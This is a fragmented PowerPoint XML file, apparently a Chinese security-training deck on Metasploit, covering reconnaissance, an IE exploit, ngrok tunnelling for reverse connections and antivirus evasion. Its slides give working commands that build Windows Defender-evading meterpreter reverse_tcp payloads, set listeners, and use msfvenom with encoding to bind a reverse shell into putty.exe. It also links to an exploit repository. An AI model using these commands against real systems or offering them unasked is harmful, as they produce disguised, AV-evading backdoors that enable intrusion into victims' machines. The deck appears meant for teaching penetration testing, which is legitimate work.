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358" r:id="rId3"/>
    <p:sldId id="359" r:id="rId4"/>
    <p:sldId id="360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361" r:id="rId26"/>
    <p:sldId id="286" r:id="rId27"/>
    <p:sldId id="287" r:id="rId28"/>
    <p:sldId id="288" r:id="rId29"/>
    <p:sldId id="289" r:id="rId30"/>
    <p:sldId id="290" r:id="rId31"/>
    <p:sldId id="291" r:id="rId32"/>
    <p:sldId id="362" r:id="rId33"/>
    <p:sldId id="293" r:id="rId34"/>
    <p:sldId id="505" r:id="rId35"/>
    <p:sldId id="506" r:id="rId36"/>
    <p:sldId id="507" r:id="rId37"/>
    <p:sldId id="294" r:id="rId38"/>
    <p:sldId id="295" r:id="rId40"/>
    <p:sldId id="296" r:id="rId41"/>
    <p:sldId id="297" r:id="rId42"/>
    <p:sldId id="509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510" r:id="rId55"/>
    <p:sldId id="511" r:id="rId56"/>
    <p:sldId id="512" r:id="rId57"/>
    <p:sldId id="513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46" r:id="rId79"/>
    <p:sldId id="347" r:id="rId80"/>
    <p:sldId id="363" r:id="rId81"/>
    <p:sldId id="491" r:id="rId82"/>
    <p:sldId id="514" r:id="rId83"/>
    <p:sldId id="492" r:id="rId84"/>
    <p:sldId id="493" r:id="rId85"/>
    <p:sldId id="494" r:id="rId86"/>
    <p:sldId id="495" r:id="rId87"/>
    <p:sldId id="334" r:id="rId88"/>
    <p:sldId id="498" r:id="rId89"/>
    <p:sldId id="335" r:id="rId90"/>
    <p:sldId id="516" r:id="rId91"/>
    <p:sldId id="515" r:id="rId92"/>
    <p:sldId id="345" r:id="rId93"/>
    <p:sldId id="365" r:id="rId94"/>
    <p:sldId id="517" r:id="rId95"/>
    <p:sldId id="372" r:id="rId96"/>
    <p:sldId id="450" r:id="rId97"/>
    <p:sldId id="524" r:id="rId98"/>
    <p:sldId id="451" r:id="rId99"/>
    <p:sldId id="453" r:id="rId100"/>
    <p:sldId id="454" r:id="rId101"/>
    <p:sldId id="518" r:id="rId102"/>
    <p:sldId id="519" r:id="rId103"/>
    <p:sldId id="520" r:id="rId104"/>
    <p:sldId id="373" r:id="rId105"/>
    <p:sldId id="503" r:id="rId106"/>
    <p:sldId id="504" r:id="rId107"/>
    <p:sldId id="501" r:id="rId108"/>
    <p:sldId id="339" r:id="rId109"/>
    <p:sldId id="521" r:id="rId110"/>
    <p:sldId id="522" r:id="rId111"/>
    <p:sldId id="471" r:id="rId112"/>
    <p:sldId id="523" r:id="rId113"/>
    <p:sldId id="472" r:id="rId114"/>
    <p:sldId id="473" r:id="rId115"/>
    <p:sldId id="474" r:id="rId116"/>
    <p:sldId id="475" r:id="rId117"/>
    <p:sldId id="476" r:id="rId118"/>
    <p:sldId id="364" r:id="rId119"/>
    <p:sldId id="348" r:id="rId120"/>
    <p:sldId id="380" r:id="rId121"/>
    <p:sldId id="366" r:id="rId122"/>
    <p:sldId id="367" r:id="rId123"/>
    <p:sldId id="369" r:id="rId124"/>
    <p:sldId id="382" r:id="rId125"/>
    <p:sldId id="370" r:id="rId126"/>
    <p:sldId id="371" r:id="rId127"/>
    <p:sldId id="374" r:id="rId128"/>
    <p:sldId id="375" r:id="rId129"/>
    <p:sldId id="376" r:id="rId130"/>
    <p:sldId id="383" r:id="rId131"/>
    <p:sldId id="344" r:id="rId1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E2E7"/>
    <a:srgbClr val="668BE4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0CFC7-3C9B-4620-AE73-F08BA5CC2E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C0D44-387F-488C-9C27-7A715A2B79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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///\\IP\LjWqptMQY\" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ip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7825" y="682625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noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>jobs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>列出漏洞运行工作</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>jobs -K </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>结束一个漏洞运行工作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3012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8161EB5-C960-4871-8A95-0EA98301AC9E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:latin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EA05944-5006-4BA0-8985-6D0F74EDEA15}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="18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</p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这个漏洞是利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>所以只要用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>浏览器打开输入就可以了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626B661-DAE3-4CAD-879D-D0DB377A5D9F}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="18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</p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>前提是没有防火墙下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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:defRPr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295" eaLnBrk="0" fontAlgn="base" hangingPunct="0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F278026-41C9-414A-B4D7-C8EEDAF049F5}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="18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</p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>现在只要在对方浏览器中输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://IP:80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>或将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:hlinkClick r:id="rId4" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>\\IP\LjWqptMQY\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>下的两个文件放入其他机器中，只需要用资源管理器打开就会访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Shell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24714" y="2500439"/>
            <a:ext cx="7142573" cy="1009524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24714" y="3602038"/>
            <a:ext cx="7142573" cy="561811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603102"/>
            <a:ext cx="12192000" cy="25489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安全培训         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>http://www.cracer.com</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0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386080" y="544830"/>
            <a:ext cx="8354695" cy="640080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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="668BE4"/>
              </a:solidFill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699135" y="1607151"/>
            <a:ext cx="10515600" cy="4207859"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="668BE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26D3-76CA-40BD-BC6C-43F199AD0C00}" type="datetimeFigureOut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C62EC-4586-460C-B32B-3605B632E36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split orient="vert" dir="in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3C58B-1263-4BF1-AC00-D94967AC28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52E82-1B0D-4500-9A39-2FD7D9C8CF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hyperlink" Target="http://www.ngrok.cc/" TargetMode="Externa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tags" Target="../tags/tag1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.shellterproject.com/download/" TargetMode="External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hack6.com/wzle/0ady/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hack6.com/wzle/gf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hyperlink" Target="https://github.com/bhdresh/CVE-2017-8759.git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664970" y="1818640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28806" y="4956329"/>
            <a:ext cx="2111232" cy="478972"/>
            <a:chOff x="4909756" y="5374159"/>
            <a:chExt cx="2111232" cy="478972"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="流程图: 终止 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4909756" y="5374159"/>
              <a:ext cx="2111232" cy="478972"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartTerminator">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1BA0C9"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="1BA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17096" y="5414799"/>
              <a:ext cx="1496695" cy="397510"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="1BA0C9"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91436" tIns="45718" rIns="91436" bIns="45718" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="456565"/>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>BY    Cracer</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" sz="2000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3106" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2251075" y="2193290"/>
            <a:ext cx="7235825" cy="1439863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1BA0C9"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr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charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="36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方正综艺简体" charset="-122"/>
                <a:sym typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="36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方正综艺简体" charset="-122"/>
                <a:sym typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>安全测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="方正综艺简体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altLang="zh-CN" sz="1800" kern="1200" dirty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Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" kern="1200" dirty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7463" y="770843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信息搜集</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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80093" y="2385107"/>
            <a:ext cx="8465559" cy="26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①whois查询：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 &gt; whois example.com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msf&gt; whois 192.168.1.100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②http://searchdns.netcraft.com/在线收集服务器 IP信息工具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③nslookup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1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" y="9756"/>
            <a:ext cx="8354695" cy="6400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如何让已经攻击成功的服务器连接内网的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>kali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" y="649836"/>
            <a:ext cx="10879455" cy="5750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hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.ngrok.cc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>注册账号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记住隧道</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，下载客户端 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>id:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>150119257159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5688132" y="3244334"/>
            <a:ext cx="81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ngrock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38" y="4171404"/>
            <a:ext cx="5733262" cy="614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9" y="1085354"/>
            <a:ext cx="6096187" cy="29427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9" y="4893452"/>
            <a:ext cx="9752381" cy="1400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52401"/>
            <a:ext cx="10986135" cy="566261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kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>建立会话 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>root/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>目录下面有 进行攻击的时候要保持始终建立会话</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>root@kali:~# ./sunny clientid 213913257159</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>获取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服务器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>地址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it-IT" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>ping gz2vip.idcfengye.com  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得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>134.175.220.239</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>payload  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>设置的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>地址为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>ngrok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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>端口为对应的端口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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>也就是说当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>在目标主机运行，他就会反过来连接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对应的端口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lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>侦听的就是本地的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>127.0.0.1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(10875)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT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09" y="3911924"/>
            <a:ext cx="11047619" cy="2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9" y="1349462"/>
            <a:ext cx="9352381" cy="1390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6" y="5445848"/>
            <a:ext cx="8066667" cy="46666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ngrok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>穿透内网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ngrok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>隧道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本机安装客户端</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>./sunny </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>clientid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>号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Msf5-</a:t>
            </a:r>
            <a:r>
              <a:t>Evasion模块免杀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2019年1月，metasploit升级到了5.0，引入了一个新的模块叫Evasion模块，官方宣称这个模块可以创建反杀毒软件的木马。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>evasion有以下几个模块,可以使用show evasion进行查看。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2897505"/>
            <a:ext cx="726186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280" y="290830"/>
            <a:ext cx="10752454" cy="640080"/>
          </a:xfrm>
        </p:spPr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Msf5-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Evasion模块免杀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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如果是之前的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>版本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(ok)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280" y="930911"/>
            <a:ext cx="10752455" cy="4884100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使用use windows/windows_defender_exe进行生成payload</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>msf5 &gt; use windows/windows_defender_exe</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>msf5 evasion(windows/windows_defender_exe) &gt; set filename payload.exe</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>msf5 evasion(windows/windows_defender_exe) &gt; set payload windows/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>msf5 evasion(windows/windows_defender_exe) &gt; set LHOST 192.168.8.124</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>msf5 evasion(windows/windows_defender_exe) &gt; set LPORT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>1177</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>msf5 evasion(windows/windows_defender_exe) &gt; run</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>需要将该文件复制到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>目录下，因为该目录为隐藏那个目录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设置侦听</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>handler -H 192.168.8.124 -P </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>1177</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> -p windows/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>复制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>ev.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>出来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>放到物理机中，查看是否查杀</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>外网查看过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>defender</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>防火墙的视频</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> bypass av </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>时间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>最近才出的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>)  av</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>指的是杀软 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>Anti-Virus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838" y="3770324"/>
            <a:ext cx="5409524" cy="18095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080" y="0"/>
            <a:ext cx="8354695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捆绑免杀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825500"/>
            <a:ext cx="10828655" cy="548766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生成payload 捆绑putty.exe</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122  -x putty.exe  -f exe -o payload3.exe</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>捆绑编码免杀</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -e x86/shikata_ga_nai -x putty.exe  -i 15 -f exe -o payload4.exe</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
